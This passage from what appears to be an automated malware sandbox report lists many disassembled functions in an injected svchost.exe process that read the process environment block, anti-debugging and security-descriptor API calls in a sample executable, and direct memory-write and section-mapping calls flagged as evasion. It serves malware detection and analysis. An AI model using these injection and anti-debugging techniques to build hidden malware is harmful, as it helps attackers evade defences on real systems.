                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]3_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6500 mov eax, dword ptr fs:[00000030h]3_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]3_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]3_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]3_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]3_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]3_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]3_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]3_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C304E5 mov ecx, dword ptr fs:[00000030h]3_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEA49A mov eax, dword ptr fs:[00000030h]3_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C364AB mov eax, dword ptr fs:[00000030h]3_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C644B0 mov ecx, dword ptr fs:[00000030h]3_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]3_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]3_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEA456 mov eax, dword ptr fs:[00000030h]3_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2645D mov eax, dword ptr fs:[00000030h]3_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5245A mov eax, dword ptr fs:[00000030h]3_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBC460 mov ecx, dword ptr fs:[00000030h]3_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]3_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]3_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]3_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]3_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]3_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]3_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]3_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]3_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]3_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2C427 mov eax, dword ptr fs:[00000030h]3_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]3_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6A430 mov eax, dword ptr fs:[00000030h]3_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]3_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]3_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]3_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]3_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]3_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]3_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]3_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]3_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]3_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]3_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5EBFC mov eax, dword ptr fs:[00000030h]3_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]3_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]3_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]3_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]3_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]3_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]3_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]3_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]3_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]3_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]3_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]3_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFAB40 mov eax, dword ptr fs:[00000030h]3_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD8B42 mov eax, dword ptr fs:[00000030h]3_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28B50 mov eax, dword ptr fs:[00000030h]3_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDEB50 mov eax, dword ptr fs:[00000030h]3_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2CB7E mov eax, dword ptr fs:[00000030h]3_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04B00 mov eax, dword ptr fs:[00000030h]3_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]3_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]3_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]3_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]3_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]3_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]3_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]3_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]3_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30AD0 mov eax, dword ptr fs:[00000030h]3_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]3_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]3_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]3_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]3_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]3_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04A80 mov eax, dword ptr fs:[00000030h]3_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C68A90 mov edx, dword ptr fs:[00000030h]3_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]3_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]3_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C86AA4 mov eax, dword ptr fs:[00000030h]3_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]3_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]3_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]3_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]3_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]3_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]3_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDEA60 mov eax, dword ptr fs:[00000030h]3_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]3_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]3_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBCA11 mov eax, dword ptr fs:[00000030h]3_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6CA24 mov eax, dword ptr fs:[00000030h]3_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5EA2E mov eax, dword ptr fs:[00000030h]3_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]3_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]3_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6CA38 mov eax, dword ptr fs:[00000030h]3_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC69C0 mov eax, dword ptr fs:[00000030h]3_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C649D0 mov eax, dword ptr fs:[00000030h]3_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]3_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]3_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]3_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]3_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]3_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]3_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]3_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB89B3 mov esi, dword ptr fs:[00000030h]3_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]3_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]3_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB0946 mov eax, dword ptr fs:[00000030h]3_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D04940 mov eax, dword ptr fs:[00000030h]3_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]3_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]3_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]3_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]3_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7096E mov edx, dword ptr fs:[00000030h]3_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]3_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]3_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]3_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBC97C mov eax, dword ptr fs:[00000030h]3_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]3_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]3_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBC912 mov eax, dword ptr fs:[00000030h]3_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]3_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]3_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB892A mov eax, dword ptr fs:[00000030h]3_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC892B mov eax, dword ptr fs:[00000030h]3_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]3_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D008C0 mov eax, dword ptr fs:[00000030h]3_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]3_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30887 mov eax, dword ptr fs:[00000030h]3_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBC89D mov eax, dword ptr fs:[00000030h]3_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C42840 mov ecx, dword ptr fs:[00000030h]3_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C60854 mov eax, dword ptr fs:[00000030h]3_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34859 mov eax, dword ptr fs:[00000030h]3_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C34859 mov eax, dword ptr fs:[00000030h]3_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBE872 mov eax, dword ptr fs:[00000030h]3_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBE872 mov eax, dword ptr fs:[00000030h]3_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6870 mov eax, dword ptr fs:[00000030h]3_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC6870 mov eax, dword ptr fs:[00000030h]3_2_03CC6870
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00700B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_2_00700B62
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_006D2622
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_006C083F
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C09D5 SetUnhandledExceptionFilter,1_2_006C09D5
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_006C0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
